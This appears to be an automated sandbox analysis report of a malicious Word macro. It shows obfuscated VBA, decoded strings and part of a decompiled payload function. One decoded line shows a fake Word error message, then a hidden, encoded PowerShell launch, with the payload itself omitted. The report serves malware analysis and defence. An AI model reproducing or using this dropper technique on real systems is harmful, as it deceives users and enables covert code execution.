                                                    hjZwD

                                                    FUyIHBDFz

                                                    CreateObject

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    AiRdGDAJ

                                                    Close

                                                    AioOpBFE

                                                    Strings | Decrypted Strings
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "OiBXGJB:\pnqsZEDV\gsZoAW.EePnB"
                                                    "eEWdaDQVJJqTHgF"
                                                    "OyFBLhlWUnD"
                                                    "TBKmUCEXTUIGu"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "OBoYzRpef:\sDLuJ\bmIQSG.MdmDR"
                                                    "NeiIGCNWgICn"
                                                    "EgxfIDVQbJotWhj"
                                                    "UjBKOEDRIbiWFB"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD"
                                                    "RhnJRGeBNASBQHHGF"
                                                    "WNFUDvHgghFdup"
                                                    "eeVVJBMGlcfXMB"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC"
                                                    "ptABFEZDmkMVIeD"
                                                    "vVbvIHcFGEAJJ"
                                                    "NisSEYrcDlKQUITa"
Line | Instruction | Meta Information
197 | Function Jlda77h_v8nx5(Wwsqkhmtfcf3_y) |
198 | On Error Resume Next | executed
199 | Goto PbhYVsA |
200 | Dim PcHRGIADo as Object |
201 | Set TXmxvp = SQQWY | SQQWY (x5)
202 | Set PcHRGIADo = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3")) | CreateObject (x5)
203 | Dim PbhYVsA as Object |
204 | Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB") | CreateTextFile (x5)
205 | PbhYVsA.WriteLine "eEWdaDQVJJqTHgF" | WriteLine (x5)
206 | PbhYVsA.WriteLine "OyFBLhlWUnD" | WriteLine (x5)
207 | PbhYVsA.WriteLine "TBKmUCEXTUIGu" | WriteLine (x5)
208 | Set qHKYGHlFA = ddanFDWJf | ddanFDWJf (x5)
209 | PbhYVsA.Close | Close (x5)
210 | Set PcHRGIADo = Nothing |
211 | Set sPkIwu = RhztCF | RhztCF (x5)
212 | Set PbhYVsA = Nothing |
212 | PbhYVsA: |
214 | Gqzsjl136wugk27i9 = Wwsqkhmtfcf3_y |
215 | Goto NuebA |
216 | Dim sTzDC as Object |
217 | Set GIAKA = kwzjKvZHe | kwzjKvZHe (x5)
218 | Set sTzDC = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3")) | CreateObject (x5)
219 | Dim NuebA as Object |
220 | Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR") | CreateTextFile (x5)
221 | NuebA.WriteLine "NeiIGCNWgICn" | WriteLine (x5)
222 | NuebA.WriteLine "EgxfIDVQbJotWhj" | WriteLine (x5)
223 | NuebA.WriteLine "UjBKOEDRIbiWFB" | WriteLine (x5)
224 | Set idbaDIr = inIcjJtaF | inIcjJtaF (x5)
225 | NuebA.Close | Close (x5)
226 | Set sTzDC = Nothing |
227 | Set KXwaABT = zBSWCKmJv | zBSWCKmJv (x5)
228 | Set NuebA = Nothing |
228 | NuebA: |
230 | Gnc9qzz9241pnhfi = Hrs2a1p95u19(Gqzsjl136wugk27i9) |
231 | Goto gxBPJB |
232 | Dim zxgLHJSFW as Object |
233 | Set quDoH = KXTliE | KXTliE (x5)
234 | Set zxgLHJSFW = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3")) | CreateObject (x5)
235 | Dim gxBPJB as Object |
236 | Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD") | CreateTextFile (x5)
237 | gxBPJB.WriteLine "RhnJRGeBNASBQHHGF" | WriteLine (x5)
238 | gxBPJB.WriteLine "WNFUDvHgghFdup" | WriteLine (x5)
239 | gxBPJB.WriteLine "eeVVJBMGlcfXMB" | WriteLine (x5)
240 | Set nleaHR = YZllAeRe | YZllAeRe (x5)
241 | gxBPJB.Close | Close (x5)
242 | Set zxgLHJSFW = Nothing |
243 | Set mgTNFCq = hjZwD | hjZwD (x5)
244 | Set gxBPJB = Nothing |
244 | gxBPJB: |
246 | Jlda77h_v8nx5 = Gnc9qzz9241pnhfi |
247 | Goto mgrwfmN |
248 | Dim RjiQHRA as Object |
249 | Set EhCMG = FUyIHBDFz | FUyIHBDFz (x5)
250 | Set RjiQHRA = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3")) | CreateObject (x5)
251 | Dim mgrwfmN as Object |
252 | Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC") | CreateTextFile (x5)
253 | mgrwfmN.WriteLine "ptABFEZDmkMVIeD" | WriteLine (x5)
254 | mgrwfmN.WriteLine "vVbvIHcFGEAJJ" | WriteLine (x5)
255 | mgrwfmN.WriteLine "NisSEYrcDlKQUITa" | WriteLine (x5)
256 | Set MNihxICY = AiRdGDAJ | AiRdGDAJ (x5)
257 | mgrwfmN.Close | Close (x5)
258 | Set RjiQHRA = Nothing |
259 | Set wTMSLyWFG = AioOpBFE | AioOpBFE (x5)
260 | Set mgrwfmN = Nothing |
260 | mgrwfmN: |
262 | End Function |

                                                    APIs | Meta Information

                                                    Pg5minli2d3c9

                                                    sreXHFD

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    eCIzUDyJ

                                                    Close

                                                    yJmmmVIAG

                                                    Replace

                                                    Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process
                                                    Replace([obfuscated command string omitted],"]anw[3",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD

                                                    Ij2hesgjee57d3s0

                                                    uVItICICB

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    anyPG

                                                    Close

                                                    YVZXECEHD

                                                    Strings | Decrypted Strings
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs"
                                                    "CcDmClHsnCC"
                                                    "aqGiHISIbAoabV"
                                                    "nJJzFRjEWpRikxCD"
                                                    "]a""nw[3"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD"
                                                    "syYTHJShrguhzb"
                                                    "TubioGUTLadgXbA"
                                                    "oLweAMoGsqVE"
                                                    Line | Instruction | Meta Information
                                                    263 | Function Hrs2a1p95u19(Svk60sycz63sk) |
                                                    264 | Q491417n8n1 = Pg5minli2d3c9 | Pg5minli2d3c9; executed
                                                    265 | Goto uWZkeMFv |
                                                    266 | Dim zDsRaIBGF as Object |
                                                    267 | Set ViWsSIH = sreXHFD | sreXHFD
                                                    268 | Set zDsRaIBGF = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3")) | CreateObject
                                                    269 | Dim uWZkeMFv as Object |
                                                    270 | Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs") | CreateTextFile
                                                    271 | uWZkeMFv.WriteLine "CcDmClHsnCC" | WriteLine
                                                    272 | uWZkeMFv.WriteLine "aqGiHISIbAoabV" | WriteLine
                                                    273 | uWZkeMFv.WriteLine "nJJzFRjEWpRikxCD" | WriteLine
                                                    274 | Set QOrvJEB = eCIzUDyJ | eCIzUDyJ
                                                    275 | uWZkeMFv.Close | Close
                                                    276 | Set zDsRaIBGF = Nothing |
                                                    277 | Set UskmBJF = yJmmmVIAG | yJmmmVIAG
                                                    278 | Set uWZkeMFv = Nothing |
                                                    278 | uWZkeMFv: |
                                                    280 | Hrs2a1p95u19 = Replace(Svk60sycz63sk, "]a" + "nw[3", Ij2hesgjee57d3s0) | Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process; Ij2hesgjee57d3s0; executed
                                                    281 | Goto iHKuDmaEr |
                                                    282 | Dim OMZxxg as Object |
                                                    283 | Set drZcHkCm = uVItICICB | uVItICICB
                                                    284 | Set OMZxxg = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3")) | CreateObject
                                                    285 | Dim iHKuDmaEr as Object |
                                                    286 | Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD") | CreateTextFile
                                                    287 | iHKuDmaEr.WriteLine "syYTHJShrguhzb" | WriteLine
                                                    288 | iHKuDmaEr.WriteLine "TubioGUTLadgXbA" | WriteLine
                                                    289 | iHKuDmaEr.WriteLine "oLweAMoGsqVE" | WriteLine
                                                    290 | Set noebIvSiu = anyPG | anyPG
                                                    291 | iHKuDmaEr.Close | Close
                                                    292 | Set OMZxxg = Nothing |
                                                    293 | Set NXbmIuHX = YVZXECEHD | YVZXECEHD
                                                    294 | Set iHKuDmaEr = Nothing |
                                                    294 | iHKuDmaEr: |
                                                    296 | End Function |

                                                    Module: Zdjtk46nm17voo

                                                    Declaration
                                                    Line | Content
                                                    1 | Attribute VB_Name = "Zdjtk46nm17voo"

                                                      Executed Functions

                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2120559921.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4fc53985985eeb755ffc9d794dbbeb122f11c294abc64cfd42042ab2a948ee65
                                                      • Instruction ID: e08fe96bc2c812efc419e6c2571681448125df03d4b39c5d561ef8e614d9dd0b
                                                      • Opcode Fuzzy Hash: 4fc53985985eeb755ffc9d794dbbeb122f11c294abc64cfd42042ab2a948ee65
                                                      • Instruction Fuzzy Hash: 65D17C2194EBC64FE7539B785C65AA07FB0EF17210B0A01EBD489CF0B3D9589D59C362
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2120559921.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7bb74d4d20f76da61dabee85c98d557bd22a156e7ee8445ca3fdfe42a3e295ab
                                                      • Instruction ID: e2502e31b877567a997b10ea253280d3b8a54540c54952d146768ad14bfe1cae
                                                      • Opcode Fuzzy Hash: 7bb74d4d20f76da61dabee85c98d557bd22a156e7ee8445ca3fdfe42a3e295ab
                                                      • Instruction Fuzzy Hash: 4441AD6094EBC29FE74787385C656A07FB0AF47210B0E05E7D484CF0B3D9199E9AC762
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2120559921.000007FF00280000.00000040.00000001.sdmp, Offset: 000007FF00280000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9d7878aa897ef53f29e10fb59683db920bd84a6d249679c74071f5418a8c2d95
                                                      • Instruction ID: d02e5de5812916d9d4c1ba208fc52d048925450eec31c4bdd5aee0d13a503c1e
                                                      • Opcode Fuzzy Hash: 9d7878aa897ef53f29e10fb59683db920bd84a6d249679c74071f5418a8c2d95
                                                      • Instruction Fuzzy Hash: E631C021A1EBC64FE79757785C65BB03FE0EF17210B4A00E7D448CB1A3D9089D99C3A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Executed Functions

                                                      C-Code - Quality: 97%
                                                      			E00232C63() {
                                                      				char _v68;
                                                      				signed int _v72;
                                                      				char _v80;
                                                      				char _v88;
                                                      				intOrPtr _v92;
                                                      				intOrPtr _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				void* _v112;
                                                      				signed int _v116;
                                                      				char _v124;
                                                      				char _v132;
                                                      				char _v140;
                                                      				char _v144;
                                                      				signed int _v148;
                                                      				void* _v152;
                                                      				void* _v156;
                                                      				signed int _v160;
                                                      				signed int _v164;
                                                      				signed int _v168;
                                                      				signed int _v172;
                                                      				signed int _v176;
                                                      				signed int _v180;
                                                      				signed int _v184;
                                                      				signed int _v188;
                                                      				signed int _v192;
                                                      				signed int _v196;
                                                      				signed int _v200;
                                                      				signed int _v204;
                                                      				signed int _v208;
                                                      				signed int _v212;
                                                      				signed int _v216;
                                                      				unsigned int _v220;
                                                      				signed int _v224;
                                                      				signed int _v228;
                                                      				signed int _v232;
                                                      				signed int _v236;
                                                      				signed int _v240;
                                                      				signed int _v244;
                                                      				unsigned int _v248;
                                                      				signed int _v252;
                                                      				signed int _v256;
                                                      				signed int _v260;
                                                      				signed int _v264;
                                                      				signed int _v268;
                                                      				unsigned int _v272;
                                                      				signed int _v276;
                                                      				signed int _v280;
                                                      				signed int _v284;
                                                      				signed int _v288;
                                                      				signed int _v292;
                                                      				signed int _v296;
                                                      				signed int _v300;
                                                      				signed int _v304;
                                                      				signed int _v308;
                                                      				signed int _v312;
                                                      				signed int _v316;
                                                      				signed int _v320;
                                                      				signed int _v324;
                                                      				signed int _v328;
                                                      				signed int _v332;
                                                      				signed int _v336;
                                                      				signed int _v340;
                                                      				unsigned int _v344;
                                                      				signed int _v348;
                                                      				signed int _v352;
                                                      				signed int _v356;
                                                      				signed int _v360;
                                                      				signed int _v364;
                                                      				signed int _v368;
                                                      				signed int _v372;
                                                      				signed int _v376;
                                                      				signed int _v380;
                                                      				signed int _v384;
                                                      				signed int _v388;
                                                      				signed int _v392;
                                                      				unsigned int _v396;
                                                      				signed int _v400;
                                                      				signed int _v404;
                                                      				signed int _v408;
                                                      				signed int _v412;
                                                      				signed int _v416;
                                                      				signed int _v420;
                                                      				signed int _v424;
                                                      				signed int _v428;
                                                      				signed int _v432;
                                                      				signed int _v436;
                                                      				signed int _v440;
                                                      				signed int _v444;
                                                      				signed int _v448;
                                                      				signed int _v452;
                                                      				signed int _v456;
                                                      				signed int _v460;
                                                      				signed int _v464;
                                                      				signed int _v468;
                                                      				signed int _v472;
                                                      				signed int _v476;
                                                      				signed int _v480;
                                                      				signed int _v484;
                                                      				signed int _v488;
                                                      				signed int _v492;
                                                      				signed int _v496;
                                                      				signed int _v500;
                                                      				signed int _v504;
                                                      				signed int _v508;
                                                      				signed int _v512;
                                                      				unsigned int _v516;
                                                      				signed int _v520;
                                                      				signed int _v524;
                                                      				signed int _v528;
                                                      				signed int _v532;
                                                      				signed int _v536;
                                                      				signed int _v540;
                                                      				unsigned int _v544;
                                                      				signed int _v548;
                                                      				signed int _v552;
                                                      				signed int _v556;
                                                      				signed int _v560;
                                                      				signed int _v564;
                                                      				signed int _v568;
                                                      				signed int _v572;
                                                      				unsigned int _v576;
                                                      				signed int _v580;
                                                      				signed int _v584;
                                                      				unsigned int _v588;
                                                      				signed int _v592;
                                                      				unsigned int _v596;
                                                      				signed int _v600;
                                                      				signed int _t1135;
                                                      				signed int _t1138;
                                                      				signed int _t1140;
                                                      				signed int _t1144;
                                                      				signed int _t1172;
                                                      				void* _t1186;
                                                      				signed int _t1199;
                                                      				void* _t1213;
                                                      				signed int _t1218;
                                                      				signed int _t1224;
                                                      				signed int _t1257;
                                                      				signed int _t1336;
                                                      				signed int _t1340;
                                                      				signed int _t1348;
                                                      				signed int _t1351;
                                                      				signed int _t1352;
                                                      				signed int _t1353;
                                                      				signed int _t1354;
                                                      				signed int _t1355;
                                                      				signed int _t1356;
                                                      				signed int _t1357;
                                                      				signed int _t1358;
                                                      				signed int _t1359;
                                                      				signed int _t1360;
                                                      				signed int _t1361;
                                                      				signed int _t1362;
                                                      				signed int _t1363;
                                                      				signed int _t1364;
                                                      				signed int _t1365;
                                                      				signed int _t1366;
                                                      				signed int _t1367;
                                                      				signed int _t1368;
                                                      				signed int _t1369;
                                                      				signed int _t1370;
                                                      				signed int _t1371;
                                                      				signed int _t1372;
                                                      				void* _t1384;
                                                      				signed int _t1385;
                                                      				void* _t1387;
                                                      				void* _t1389;
                                                      				void* _t1391;
                                                      				void* _t1392;
                                                      				void* _t1393;
                                                      
                                                      				_t1387 = (_t1385 & 0xfffffff8) - 0x258;
                                                      				_v596 = 0x54d1;
                                                      				_t1225 = 0x2a32d0a;
                                                      				_t1351 = 0x66;
                                                      				_v596 = _v596 / _t1351;
                                                      				_t1352 = 0x6b;
                                                      				_v596 = _v596 / _t1352;
                                                      				_v596 = _v596 >> 4;
                                                      				_v596 = _v596 ^ 0x00002830;
                                                      				_v416 = 0xcdcb;
                                                      				_v416 = _v416 + 0x2116;
                                                      				_t1353 = 0x1f;
                                                      				_v416 = _v416 * 0x30;
                                                      				_v416 = _v416 ^ 0x002c9323;
                                                      				_v488 = 0x9982;
                                                      				_v488 = _v488 | 0x10c88477;
                                                      				_v488 = _v488 ^ 0xa41c88c2;
                                                      				_v488 = _v488 / _t1353;
                                                      				_v488 = _v488 ^ 0x05d51165;
                                                      				_v496 = 0x77c8;
                                                      				_v496 = _v496 >> 3;
                                                      				_t1354 = 0xa;
                                                      				_v496 = _v496 / _t1354;
                                                      				_v496 = _v496 << 7;
                                                      				_v496 = _v496 ^ 0x0000cb31;
                                                      				_v232 = 0x48c9;
                                                      				_v232 = _v232 << 0xe;
                                                      				_v232 = _v232 ^ 0x12321472;
                                                      				_v360 = 0x3c3d;
                                                      				_t1218 = 5;
                                                      				_v360 = _v360 / _t1218;
                                                      				_v360 = _v360 * 0x2f;
                                                      				_v360 = _v360 ^ 0x000268e3;
                                                      				_v176 = 0x1856;
                                                      				_v176 = _v176 * 0x70;
                                                      				_v176 = _v176 ^ 0x000ab2a8;
                                                      				_v264 = 0xa86e;
                                                      				_v264 = _v264 + 0xffff13b3;
                                                      				_v264 = _v264 ^ 0xffffefbf;
                                                      				_v376 = 0x5423;
                                                      				_v376 = _v376 + 0xffffd432;
                                                      				_v376 = _v376 | 0x32249576;
                                                      				_v376 = _v376 ^ 0x3224c778;
                                                      				_v248 = 0xe66f;
                                                      				_v248 = _v248 >> 9;
                                                      				_v248 = _v248 ^ 0x000023ba;
                                                      				_v308 = 0x205b;
                                                      				_v308 = _v308 + 0xffff1f5e;
                                                      				_v308 = _v308 << 8;
                                                      				_v308 = _v308 ^ 0xff3fb884;
                                                      				_v484 = 0x592;
                                                      				_v484 = _v484 + 0xffffd519;
                                                      				_v484 = _v484 | 0x759ff25f;
                                                      				_v484 = _v484 + 0x87eb;
                                                      				_v484 = _v484 ^ 0x00008574;
                                                      				_v168 = 0x6ddb;
                                                      				_v168 = _v168 | 0x6e943d07;
                                                      				_v168 = _v168 ^ 0x6e944d9a;
                                                      				_v200 = 0xd6b0;
                                                      				_v200 = _v200 + 0xffff46fa;
                                                      				_v200 = _v200 ^ 0x00002650;
                                                      				_v452 = 0x246b;
                                                      				_v452 = _v452 ^ 0x586b7630;
                                                      				_v452 = _v452 << 0xc;
                                                      				_v452 = _v452 + 0xd57e;
                                                      				_v452 = _v452 ^ 0xb526cd97;
                                                      				_v348 = 0xfa69;
                                                      				_t1340 = 0x52;
                                                      				_t1355 = 0x65;
                                                      				_v348 = _v348 * 0x65;
                                                      				_v348 = _v348 | 0xab757825;
                                                      				_v348 = _v348 ^ 0xab77a96f;
                                                      				_v324 = 0xa741;
                                                      				_v324 = _v324 ^ 0x4f747397;
                                                      				_v324 = _v324 / _t1340;
                                                      				_v324 = _v324 ^ 0x00f83cd8;
                                                      				_v296 = 0x788d;
                                                      				_v296 = _v296 ^ 0x0ef2968d;
                                                      				_v296 = _v296 ^ 0x495ddb9a;
                                                      				_v296 = _v296 ^ 0x47af2616;
                                                      				_v220 = 0xb89f;
                                                      				_v220 = _v220 >> 0xb;
                                                      				_v220 = _v220 ^ 0x000056af;
                                                      				_v520 = 0x12ce;
                                                      				_v520 = _v520 + 0xe747;
                                                      				_v520 = _v520 << 7;
                                                      				_v520 = _v520 | 0x5b07959e;
                                                      				_v520 = _v520 ^ 0x5b7fa869;
                                                      				_v208 = 0xa95c;
                                                      				_v208 = _v208 + 0xffff5ee2;
                                                      				_v208 = _v208 ^ 0x00000a9e;
                                                      				_v172 = 0xa2eb;
                                                      				_v172 = _v172 * 0x79;
                                                      				_v172 = _v172 ^ 0x004d63d4;
                                                      				_v180 = 0x98a7;
                                                      				_v180 = _v180 | 0x8ae8094c;
                                                      				_v180 = _v180 ^ 0x8ae8e600;
                                                      				_v424 = 0xd5a0;
                                                      				_v424 = _v424 << 5;
                                                      				_v424 = _v424 / _t1355;
                                                      				_v424 = _v424 ^ 0x00007145;
                                                      				_v392 = 0x548d;
                                                      				_v392 = _v392 + 0xffff9ec2;
                                                      				_v392 = _v392 + 0xffffa1fb;
                                                      				_v392 = _v392 ^ 0xffff9dba;
                                                      				_v340 = 0x6e45;
                                                      				_t1356 = 0x16;
                                                      				_v340 = _v340 / _t1356;
                                                      				_v340 = _v340 + 0xffff4bce;
                                                      				_v340 = _v340 ^ 0xffff3c02;
                                                      				_v536 = 0xbde4;
                                                      				_v536 = _v536 * 0x7f;
                                                      				_v536 = _v536 ^ 0x574a5eba;
                                                      				_v536 = _v536 << 0xd;
                                                      				_v536 = _v536 ^ 0x8d54c30e;
                                                      				_v284 = 0x7ef6;
                                                      				_v284 = _v284 + 0x9ef0;
                                                      				_v284 = _v284 ^ 0x00015c31;
                                                      				_v408 = 0xc211;
                                                      				_v408 = _v408 ^ 0x3543d7c0;
                                                      				_v408 = _v408 * 0x2b;
                                                      				_v408 = _v408 ^ 0xf244fbb0;
                                                      				_v588 = 0x856b;
                                                      				_v588 = _v588 ^ 0xfc1cd259;
                                                      				_v588 = _v588 ^ 0x7d294751;
                                                      				_v588 = _v588 >> 0xe;
                                                      				_v588 = _v588 ^ 0x000240de;
                                                      				_v508 = 0x646a;
                                                      				_t1357 = 0x1e;
                                                      				_v508 = _v508 / _t1357;
